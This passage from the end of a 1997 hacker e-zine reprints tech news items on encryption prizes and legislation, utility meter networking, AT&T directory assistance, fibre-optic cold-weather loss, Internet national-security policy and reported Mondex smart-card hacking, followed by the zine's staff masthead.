reach $32.2 billion by 2001, with the services market alone reaching $7
billion in 1997 and rising to $29 billion by 2001, says Dataquest.

(Toronto Financial Post 21 Aug 97)
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

Hackers vie for $1-million reward

Austin, Texas start-up Crypto-Logic Corp. has offered a $1-million reward to
whomever can crack its new e-mail encryption system within a year.
Cryptologists generally agree that Crypto-Logic's technology, called a
"one-time pad" is theoretically uncrackable -- each "pad" has a set of
uniquely random digital symbols that are coded to the actual message.

The recipient uses the same pad to decode the message, and each pad is used
only once. Still, experts are warning never to underestimate the tenacity of
computer hackers: "Anyone who says their system is bulletproof is either a
liar or stupid," says one. "If I'm wrong," says Crypto-Logic's VP and COO,
"we're out of business." http://www.ultimateprivacy.com

(Wall Street Journal 22 Aug 97)
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

Digitizing Your Meter Reader
by Gene Koprowski

18.Sep.97.PDT -- A visit from the meter man is rarely a cherished event.
Meter readers dread the prospect of crazed canines, and customers don't much
like strangers tromping through their yard or basement.

To automate this timeworn process, utility companies are piloting programs
that use customized networking technology to remotely read meters and monitor
the energy usage of specific appliances. A technology trial at Nashville
Electric Service, a division of the Tennessee Valley Authority - the
Depression-era creation of President Franklin Roosevelt - will link consumers
to the energy company via a computer network.

The technology behind the service - developed by Nortel and TeCom - provides
automatic meter reading, outage detection, and remote connect and disconnect
capabilities. To test the service, Nashville Electric is installing a network
router and digital meter reader in the homes of 100 residential customers -
and in the offices of about 40 customers.

These meters will be linked to LANs and PCs, creating a bi-directional
consumer electronics network: Individual appliances, like a toaster,
microwave or refrigerator, will be online, enabling consumers to monitor
their usage down to the kilowatt, said TeCom spokesman Mike Mahoney.

"It will allow users to analyze their usage patterns, as they do with
long-distance phone bills," Mahoney said. "If the toaster is using too much
energy, they can reduce their toasting activity."

The technology project was inspired by the move toward deregulation in the
utility industry, said Teresa Corlew, a spokeswoman for Nashville Electric.
Companies are looking for ways to show consumers how they can lower costs;
technology is one way to do that. "We want to run the test for a year and
then assess the results," she said. "After that, we may roll it out to the
entire area."

Those participating in the test are volunteers who happen to have PCs in
their home and are concentrated in an area of the city that relies primarily
on electric service, rather than gas.

The voluntary nature of the test may be smart marketing for Nashville
Electric. In Roselle, Illinois, a suburb of Chicago, a water meter-reading
system was recently installed that employs the telephone network. All
residents must comply with the system by January, or they will be fined. But,
says Darcy Bretz, a local resident, several people in the suburb don't like
the idea because they think that their phones are being tapped and that their
privacy is being invaded.

Other experiment-minded locales are examining wireless data networks, which
will be online for tests in Massachusetts and Rhode Island by early 1998,
using a small, low-cost radio device that is hooked to an existing meter. It's
hoped that the technology's unobtrusiveness will win over consumers -
observers indicate that customer-preference must drive these trials.

"This kind of thing is starting to go on all over the industry," said Lori
DeMatteis, a senior associate at Metzler Associates, a Chicago-based energy
consultant. "There are a lot of different technologies and billing systems
that are emerging, but no clear winner yet. There will be several benefits
that users will see. There will be increased accuracy in billing, for
instance. Also, you won't have to worry about the man entering your yard, and
they don't have to worry about your dog."

©1993-97 Wired Ventures, Inc.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

AT&T Tests New `00' INFO Directory Assistance Service
September 22, 1997

Directory Assistance the Way Customers Really Want It

SEATTLE, Sept. 22 PRNewswire -- AT&T today announced that it will conduct a
market trial of its new AT&T "00" INFO(SM) (Double-0 Info) national
directory assistance service in the Seattle area. Beginning today, AT&T
customers in Seattle will be able to dial "00" to obtain telephone listings
for any place in the United States with one simple phone call -- even if
they don't have the area code or exact city.

In marked contrast to the industry trend to provide fully automated directory
assistance, AT&T "00" INFO Service features personal, courteous, helpful
service from specially trained AT&T information assistants who will stay on
the line for the entire call. From the moment they greet the customer by
introducing themselves, AT&T assistants are there to help customers simplify
their lives, by searching for a directory listing with as little information
as a partial name and a locality or state. And AT&T assistants will stay with
the customer through the end of the call when they provide the requested
information.

"We're providing directory assistance the way customers really want it," said
Howard McNally, vice president of AT&T Consumer Markets Division. "AT&T is
bringing back the personal touch. Not only will we stay on the line with our
customers, but we'll do everything within our power to meet their needs --
using enhanced search features to find the listings they want, and even the
address and zip code, if that's what they need."

In addition to personal service, AT&T "00" INFO also includes several new
search capabilities:

* A new expanded search capability allows AT&T information assistants to
extend a directory search to surrounding communities when they can't find a
requested listing in a designated city or town -- even if the caller doesn't
know what those communities are.

* A key word search function allows AT&T information assistants to search for
a business listing when the caller doesn't know the full or exact name of the
business. This search will find the listing if the key word appears anywhere
in the name.

Seattle is one of only five service markets in the United States to be
selected to test the new AT&T "00" INFO Service. The other test sites are
Minneapolis, Phoenix, Denver and Portland, Ore.

AT&T customers in these trial markets need only dial one simple number, "00,"
from their home phone to reach an AT&T information assistant who will help
them find telephone listings anywhere in the United States. This means they
no longer need to dial multiple numbers for directory assistance, or know
whether the desired number is local or long distance. And since they don't
need to know the area code to get a listing, customers no longer need to make
two calls for a listing -- the first for the area code, and the second for
the telephone number.

During the market trial, AT&T is offering the new AT&T "00" INFO Service at
the same 95-cent price for two listings that it charges for its conventional
directory assistance. In addition, customers can request an unlimited number
of listings on a single call.

When AT&T customers dial "00" from their home phones, they will hear the
familiar AT&T acknowledgment, followed by an automated system prompting them
to press "1" for AT&T "00" INFO directory assistance.

AT&T "00" INFO Service is also available to AT&T customers in the (CITY) area
even when they are away from their residence phone. By dialing
1-800-CALL-ATT, followed by Prompt "4," customers will be connected to AT&T
"00" INFO directory assistance.

The AT&T "00" INFO directory assistance service trial is limited to listings
in the United States. SOURCE AT&T

©PR Newswire. All rights reserved.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

Bellcore Scientists See Cold-Weather Problems (And Possible Solutions)
For Dense WDM Cables
September 22, 1997

SAN DIEGO, Calif.--(BUSINESS WIRE)--September 22, 1997--Cold weather
presents important challenges to dense-wavelength-division-multiplexing
technology, but those challenges can be overcome by prudent risk-assessment
and proper network planning, Bellcore scientists revealed today.

The scientists, Gabor Kiss, Osman Gebizlioglu, Dean Rader and Casey
Wieczorek, published their observations in a paper delivered today at the
National Fiber Optic Engineering Conference, here. The paper, "New
Developments in Temperature-Induced Cable Loss," is one of a series of
studies on fiber-optic cable performance made by Bellcore over the past five
years.

"We've known for awhile that cold weather changes the internal geometry of
fiber-optic cable, and that this change bends the optical fibers in ways they
weren't designed to be bent," said Kiss. "However, we also knew that this was
something we could live with in equipment operating at 1310 nanometers. With
dense WDM transmission, which happens at 1550 nanometers, the loss becomes
much worse."

Kiss added that some makers of DWDM systems plan to use 1625 nanometers for
network supervision. "Our study indicates that this supervision would fail
long before the network failed at 1550 nanometers," Kiss said.

Finally, Kiss pointed out that extremely cold weather can affect both the
"working" and "protected" channels -- that is, the fiber being used and the
fiber being held in reserve. "That means that temperature-induced cable loss
over a wide geographic area may frustrate a diverse-routing protection
scheme," Kiss said.

Kiss, Gebizlioglu, Rader and Wieczorek subjected cables to several years of
simulated seasonal cycles and monitored the loss in their laboratory in
Morristown, New Jersey. They also conducted field tests on cables at
Bellcore's research facility in Chester, New Jersey, and in Maine.

For equipment suppliers and network operators, Kiss said, this news should be
sobering, but not discouraging.

"The fact is that there are ways to assess the individual risk faced by
particular products in particular environments, and Bellcore is available to
assess that risk and work toward a way to minimize it," Kiss said.

Kiss and his colleagues are also engaged in writing Bellcore generic
requirements for DWDM equipment, and for fiber-optic cable.

Bellcore, headquartered in Morristown, New Jersey, is a leading provider of
communications software, engineering and consulting services based on
world-class research. Bellcore creates business solutions that make
information technology work for telecommunications carriers, businesses and
governments worldwide. Bellcore has sales offices throughout the United
States, Europe, Central and South America, and the Asia-Pacific region. On
November 21, 1996, SAIC (Science Applications International Corporation)
announced that it had agreed to purchase Bellcore once requisite regulatory
approvals had been obtained. More information about Bellcore is available at
its Web site, www.bellcore.com

©Business Wire.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

Is the Internet a Matter of National Security?
Monday, September 22, 1997

Gary Chapman is director of the 21st Century Project at the University of
Texas at Austin. He can be reached at Gary.chapman@mail.utexas.edu

Slowly but surely, step by incremental step, the Internet is being pulled
into the forbidding black hole of "national security." Several recent
developments have raised warning flags that the global communications
network is now regarded as the turf of the people and institutions left over
from the Cold War.

On Sept. 5, the President's Commission on Critical Infrastructure
(http://www.pccip.gov/) released a report calling for a huge increase in
funding for protection of the "critical systems" of the nation, including
electric power distribution, telecommunications, banking and finance, water,
transportation, oil and gas storage and transportation, emergency services
and government services.

The commission recommended doubling the current federal R&D budget of $250
million for protecting these systems, with increases of $100 million each
year after 1999 to $1 billion per year by 2004.

The commission's chairman, retired Air Force Gen. Robert T. Marsh, told the
Associated Press, "These are the life-support systems of
the nation. They're vital, not only for day-to-day discourse, they're vital
to national security. They're vital to our economic competitiveness
worldwide, they're vital to our very way of life."

Ten days ago, the House Select Committee on Intelligence in the U.S. Congress
voted to require that all technology for encrypting data provide a "key" that
could be obtained by law enforcement or national security officials. The vote
reversed a trend toward relaxing such controls--one of the chief political
goals of the high-tech industry. Committee members cited the warnings they
received in "classified briefings" as the main reason for their vote.

Later this month there will be a high-level conference in Chicago titled "The
Information Revolution: Impact on the Foundations of National Power," hosted
by the Center for Strategic and International Studies (http://www.csis.org)
and featuring many of the graybeards of the national security state, such as
arms control negotiator Paul Nitze, former Georgia Sen. Sam Nunn, Bob Galvin
of Motorola and ubiquitous conservative pundit William Bennett.

This signifies the discovery of the Internet by the highest mandarins of the
American power establishment, and the title of the conference frames the
subject in an ominous fashion.

This summer I was visited by, and gave a briefing to, a delegation of
Washington experts from the intelligence community--about a dozen gentlemen
from the CIA, the National Security Agency, the Treasury Department and the
Pentagon. It was at this meeting that I first heard the explicit statement
that the Internet is now regarded as a critical national asset that these
agencies believe needs their protection and attention.

The Internet, of course, has always been linked to the Defense Department--it
began, in the late 1960s, as a defense research project, and the Defense
Advanced Research Projects Agency was its overseer until 1983.

But the Pentagon never considered the Internet (or Arpanet, as it was known
until 1983) to be a "critical" communications network. There is a persistent
myth that the Internet was developed in a particular way to sustain damage in
a nuclear attack, but this was never true, as is pointed out in the
definitive history of the Net, "When Wizards Stay Up Late," by Katie Hafner
and Matt Lyon. The Internet was always a research project and chiefly a means
to pass information between incompatible computer systems.

But now the Internet is increasingly embedded in the nation's economic life.
More and more commerce is conducted on the Internet. Basic utilities, like
power and water, are beginning to use Internet-related computer networks for
monitoring services. The federal government is increasingly dependent on
computer-mediated communication over networks.

Many people in positions of power see the Internet as a precursor to a vast
global infrastructure of commerce and communication that the U.S. is likely
to dominate. Whatever global empire the U.S. will have in the 21st century is
likely to depend on this technology.

This global character of the Internet raises an interesting paradox for the
national security community. The Internet promises easy global commerce for
companies, no matter where they're physically located. These companies have
an intense interest in computer security, but they tend to be wary, if not
hostile, to national security imperatives.

When the Reagan administration, in the mid-1980s, attempted to implement a
new security classification for digital information called "sensitive not
secret," the private sector rebelled, and the proposal was killed. In the
same period, manufacturers of supercomputers and high-end workstations chafed
at Pentagon export controls.

Now the battle is being waged over encryption, and last week's defeat for
business may raise the stakes. The House committee vote "is a disaster," said
Rebecca Gould, vice president for public policy at the Business Software
Alliance (http://www.bsa.org).

Business leaders outside the defense industry have long had a strained
relationship with the spooks and Dr. Strangeloves of the national security
community. During World War I, for example, Henry Ford and other major
industrialists were pacifists and globalists who railed against militarism,
jingoism and paranoia.

The military responded by accusing Ford and his supporters of greed,
obsession with profits, and a lack of patriotism. For most of the first half
of this century, U.S. business leaders believed the military and its
attitudes were the chief enemies of commerce, which they regarded as the
foundation of world peace.

These days, with the Internet firmly in the hands of the private sector, the
noises coming from the Pentagon, the CIA and the FBI are much more
conciliatory--they promise to "work with industry" to help "secure" the
nation's "critical systems."

But this contemporary savoir-faire should make us even more nervous. Looming
before us is the absorption of the free and open Internet into the gloomy
abyss of classified information, black budgets, secrecy, surveillance,
shadowy characters, macho patriotic posturing, and all the other trappings of
"national security."
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

Hacking Smart Card Chips: At What Cost?
09/25/97
By Mo Krochmal, TechWeb

LONDON -- Mondex International, developer of one of the world's leading
electronic cash cards, has come under fire from a security expert for
allegedly underestimating the ability of criminals to hack into its
products.

The E-cash pioneer, which is controlled by MasterCard International,
announced Monday its latest chip, the H8/3109 device developed by Hitachi.
E-cash cards let users pay for goods and services with electronic tokens that
can be freely exchanged for paper money and coins in banks.

Mondex, which said it plans to market 5 million E-cash cards by the end of
1998, said in a statement that the chip had undergone "fault-analysis
interrogation by some of the leading chip and security laboratories in the
world."

But Mondex was criticized Monday by a leading academic cryptography expert
for underestimating the risks of the card being hacked. Ross Anderson, a
professor at Cambridge University in England, said the technical
sophistication of the security measures taken by Mondex does not reflect the
high level of technology and skills available to criminals.

"I think Mondex picked an inappropriate time to go for a world launch. There
are too many new attacks -- people are looking at things all the time,"
Anderson said. "If something is released today, there is no guarantee it will
be good three months from now. In five or 10 years, things will have
stabilized."

The Mondex card was the subject of rumors earlier this month that it had been
successfully hacked, following a presentation at the Eurocrypt cryptography
conference this summer. The Eurocrypt presentation showed that the surface
wiring of a silicon chip, which was not identified by name, could be
manipulated in a way that allowed access to the information stored inside.

According to a document posted on the Web, Mondex was the subject of the
attack described at Eurocrypt. The anonymous posting said an ion beam was
used to reconnect a link on the surface of a Mondex chip, letting the memory
be output to the card's serial port. Mondex denied the claim Wednesday.

John Beric, head of security at Mondex, said the type of attack described at
Eurocrypt had not been state-of-the-art for many years. He added that the
Mondex chip design was adapted in 1992 to take into account such an attack.
Mondex chips are still tested for attacks such as those described in the
anonymous posting, he said.

"No system is perfect. We go on the contingency that something horrible is
going to happen, and we have contingency plans so we can tolerate a loss and
stem it where we can," Beric said.

Mondex and chip manufacturers argue that the high cost of hacking into a
single chip, "a process which requires skill and expensive equipment," means
hacking cards is uneconomic, because breaking one chip's security doesn't
necessarily mean breaking into other chips.

"Any chip can be compromised, the question is: How much money does it cost to
compromise the chip? The goal is to make the cost of compromising the chip
greater than the value of compromising the chip," said Thomas Horton, smart
card microchip product manager at Hitachi.

But some academics said the chip industry's cost-benefit argument is flawed.

Hacking, or reconfiguring a chip, "is a routine process," according to John
Orloff, a professor at the Laboratory for Ion Beam Research and Applications
at the University of Maryland, in College Park.

Orloff said a technician with access to a focused ion-beam machine and
intimate knowledge of a chip could "lay down a few microns" and reconstitute
something such as a severed link on a chip in just 30 minutes. The machinery
to do something like that is not cheap, Orloff said, but it is common in
semiconductor labs and universities.

©CMP Media, 1996.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

House Panel Rejects Crypto Amendment
by Rebecca Vesely

24.Sep.97.PDT -- After nearly four hours of wrangling, the House Commerce
Committee today passed a market-friendly encryption bill, voting down an
amendment 35-16 that would have imposed strict domestic controls on
encryption.

"Throughout this debate in the past few weeks, the members have been swinging
towards privacy," Representative Edward Markey (D-Massachusetts) told
reporters after the vote. "I think that's going to happen in every single
public debate that's held."

The Security and Freedom through Encryption Act, sponsored by Representative
Bob Goodlatte (R-Virginia), passed in a 40-11 vote with an amendment that
strengthens penalties for using encryption in a crime from five years to 10.
The amendment, sponsored by Markey and Representative Rick White
(R-Washington), also establishes a "national encryption technology center" in
which companies would work with law enforcement on encryption technologies,
although where funding for the center would come from or who would
participate is undefined.

But the committee and the House remain deeply divided over just how much
access law enforcement should have to digital communications. Despite two
weeks of 'round-the-clock staff work and lobbyists haunting members and
aides, panel members could not find a compromise between law enforcement and
privacy concerns. In fact, many could not understand why technology can't
sort the whole mess out.

"If these cryptographers are so smart, why don't they invent some decryption
devices for law enforcement?" asked Representative Mike Oxley (R-Ohio), a
former FBI agent and chief sponsor of the pro-law-enforcement amendment that
failed.

Arguments for the need for law enforcement to access encrypted data surfaced
again and again, as members pointed out that drug cartels use strong
encryption to secure their data.

"Computers and the Internet have become fertile ground for terrorists, drug
cartels, and child pornographers," said Representative Greg Ganske (R-Iowa).

But the committee majority appeared to be swayed by the argument that the
wide availability of strong encryption on the global market made Oxley's
proposal - to prevent all Americans from using encryption without immediate
access to plaintext by law enforcement - illogical.

"This is the Prohibition of the electronic age," said Representative Anna
Eshoo (D-California). "People drank anyway. Liquor was out there, and it was
easy to make."

Markey said the Oxley proposal's requirement for easy access to encrypted
data could become the "Achilles' heel of electronic commerce."

The bill's next test: the House Rules Committee, which will decide in what
form, if any, the bill will reach the House floor. Two weeks ago, the House
Intelligence and National Security committees passed a series of amendments,
one similar to Oxley's, that would undercut the intent of Goodlatte's
original legislation.

Rules Committee chair Gerald Solomon (R-New York) sent a letter to Commerce
Committee members warning them that he will block any variation on the
Goodlatte bill that does not carry the strong key recovery provision Oxley
tried to get passed.

Goodlatte told reporters after the Commerce panel session that he is going to
work immediately to try to get the bill over the next hurdle.

"We are certainly going to be working with the leadership and the Rules
Committee to make sure everybody who has an opinion about this gets heard and
that we design a bill that will have strong bipartisan support," he said.

Goodlatte still faces a long road. The bill has 252 House co-sponsors - a
solid majority should it reach the floor. But it would still have to be
reconciled with radically different Senate legislation and gain President
Clinton's signature before it becomes law.

©1993-97 Wired Ventures, Inc.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

Internet Addict Placed on Probation in Ohio - from FH

CINCINNATI (Reuter) - An Ohio woman described by police as an Internet addict
was placed on two years probation Tuesday for neglecting her three small
children while spending several hours a day on her home computer.

Police said Sandra Hacker, 24, kept her three children in deplorably filthy
conditions in a separate room of her apartment, while devoting her time to the
Internet.

Judge William Mallory of Cincinnati Municipal Court also fined Hacker $100 and
court costs and suspended a 180-day jail sentence on condition that she take
parenting classes under supervision of probation officials.

The children, ages 2, 3, and 5, have been in the custody of her estranged
husband since she was arrested on the neglect charges earlier this year, her
attorney, John Burlew, told Reuters.

Permanent custody rights will be determined in a divorce proceeding in which
the couple is now involved, he said.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: thtj communications, inc.³
ú-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Editor-in-Chief: Scud-O, scud@thtj.com
Executive Editor: KungFuFox, mazer@cycat.com
Submissions Editor: Keystroke, keystroke@thepentagon.com
Distribution Editor: Malhavoc, malhavoc@thtj.com
Site Manager: Scud-O, scud@thtj.com
Content Editors: FH, fh@sinnerz.com
                 Malhavoc, malhavoc@thtj.com
                 Phrax, phrax@thtj.com

Staff Writers: memor, memor@thtj.com
               ArcAngel, arcangel@thtj.com
               lurk3r,
               Shok,
               The Messiah, tm@sinnerz.com

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

A-th-a-th-a-th-a-that's all folks!

Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: - End of Communique - ³
ú-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
